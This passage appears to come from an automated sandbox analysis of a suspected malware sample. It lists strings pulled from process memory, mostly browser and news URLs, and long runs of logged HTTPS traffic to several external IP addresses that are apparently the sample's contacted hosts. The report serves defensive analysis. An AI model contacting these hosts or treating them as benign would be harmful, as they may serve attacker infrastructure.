Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000010.00000003.2612865714.00000000055C0000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000010.00000003.2612865714.00000000055C0000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown Network traffic detected: HTTP traffic on port 62326 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62280
Source: unknown Network traffic detected: HTTP traffic on port 62303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62281
Source: unknown Network traffic detected: HTTP traffic on port 62378 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62282
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62283
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62284
Source: unknown Network traffic detected: HTTP traffic on port 62252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62384 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62281 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62395
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62275
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62396
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62398
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62399
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62279
Source: unknown Network traffic detected: HTTP traffic on port 62390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62290
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62291
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62292
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62294
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62295
Source: unknown Network traffic detected: HTTP traffic on port 62308 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62321 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62367 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62315 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62258 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62275 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62285
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62286
Source: unknown Network traffic detected: HTTP traffic on port 62332 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62287
Source: unknown Network traffic detected: HTTP traffic on port 62395 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62288
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62289
Source: unknown Network traffic detected: HTTP traffic on port 62286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62343 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62400 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62296
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62297
Source: unknown Network traffic detected: HTTP traffic on port 62356 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62298
Source: unknown Network traffic detected: HTTP traffic on port 62299 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62299
Source: unknown Network traffic detected: HTTP traffic on port 62337 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62396 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62274 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62360
Source: unknown Network traffic detected: HTTP traffic on port 62294 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62345 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62322 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62359
Source: unknown Network traffic detected: HTTP traffic on port 62339 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62285 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62351
Source: unknown Network traffic detected: HTTP traffic on port 62394 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62354
Source: unknown Network traffic detected: HTTP traffic on port 62354 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62355
Source: unknown Network traffic detected: HTTP traffic on port 62316 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62356
Source: unknown Network traffic detected: HTTP traffic on port 62371 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62358
Source: unknown Network traffic detected: HTTP traffic on port 62304 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62377 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62371
Source: unknown Network traffic detected: HTTP traffic on port 62360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62279 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62362
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62363
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62364
Source: unknown Network traffic detected: HTTP traffic on port 62311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62365
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62367
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62368
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62369
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62380
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62260
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62381
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62261
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62382
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62383
Source: unknown Network traffic detected: HTTP traffic on port 62305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62252
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62253
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62374
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62254
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62375
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62255
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62376
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62377
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62378
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62258
Source: unknown Network traffic detected: HTTP traffic on port 62350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62390
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62270
Source: unknown Network traffic detected: HTTP traffic on port 62295 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62392
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62393
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62394
Source: unknown Network traffic detected: HTTP traffic on port 62383 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62344 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62284 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62386
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62387
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62388
Source: unknown Network traffic detected: HTTP traffic on port 62355 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62290 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62341 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62255 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62315
Source: unknown Network traffic detected: HTTP traffic on port 62387 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62316
Source: unknown Network traffic detected: HTTP traffic on port 62364 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62317
Source: unknown Network traffic detected: HTTP traffic on port 62312 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62318
Source: unknown Network traffic detected: HTTP traffic on port 62278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62358 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62312
Source: unknown Network traffic detected: HTTP traffic on port 62335 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62289 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62300 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62398 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62381 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62329 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62346 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62329
Source: unknown Network traffic detected: HTTP traffic on port 62370 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62261 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62321
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62322
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62324
Source: unknown Network traffic detected: HTTP traffic on port 62399 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62301 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62376 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62382 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62337
Source: unknown Network traffic detected: HTTP traffic on port 62340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62339
Source: unknown Network traffic detected: HTTP traffic on port 62283 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62332
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62335
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62336
Source: unknown Network traffic detected: HTTP traffic on port 62266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62291 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62350
Source: unknown Network traffic detected: HTTP traffic on port 62306 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62365 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62348
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62349
Source: unknown Network traffic detected: HTTP traffic on port 62277 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62340
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62341
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62343
Source: unknown Network traffic detected: HTTP traffic on port 62359 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62393 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62317 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62344
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62345
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62346
Source: unknown Network traffic detected: HTTP traffic on port 62351 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62307 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62368 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62297 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62363 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62282 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62400
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62401
Source: unknown Network traffic detected: HTTP traffic on port 62336 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62292 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62392 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62352 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62375 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62270 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62287 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62369 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62304
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62305
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62306
Source: unknown Network traffic detected: HTTP traffic on port 62386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62307
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62308
Source: unknown Network traffic detected: HTTP traffic on port 62401 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62309
Source: unknown Network traffic detected: HTTP traffic on port 62298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62300
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62301
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62302
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62303
Source: unknown HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:62252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62255 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.4:62260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.168.2.4:62261 -> 107.173.160.137:443 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:62275 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62277 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62280 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:62279 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62281 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62283 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62284 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62287 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62288 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62291 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62297 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62312 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.168.2.4:62312 -> 167.235.128.153:443 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62315 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62317 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62321 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62332 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62335 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62337 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62339 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62340 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62341 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62343 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62344 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62345 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62346 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62348 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62351 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62354 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62355 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62356 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62358 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62359 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62360 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62362 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62363 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62364 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62365 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62367 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62368 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62369 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62370 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62371 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62374 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62375 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62376 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62377 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62378 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62380 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62381 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62382 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62383 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62384 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62386 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62387 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62388 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62390 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62392 version: TLS 1.2
